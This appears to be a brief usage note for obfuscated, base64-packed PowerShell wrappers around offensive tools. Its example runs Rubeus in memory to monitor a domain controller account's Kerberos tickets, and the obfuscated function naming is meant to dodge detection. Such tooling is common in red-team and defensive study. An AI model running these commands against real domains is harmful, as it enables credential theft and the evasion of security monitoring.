Base 64 + OBFS
USE: (Invoke-{FUNC NAME}) -Command "{CMD}"
EXAMPLE: Invoke-3nhxoxe3hww -Command "-h"
-OR-
use: [{NAME}.Program]::Main("ARGS$".Split())
EXAMPLE: [Rubeus.Program]::Main("monitor /monitorinterval:2 /targetuser:DC$ /nowrap".Split())
8000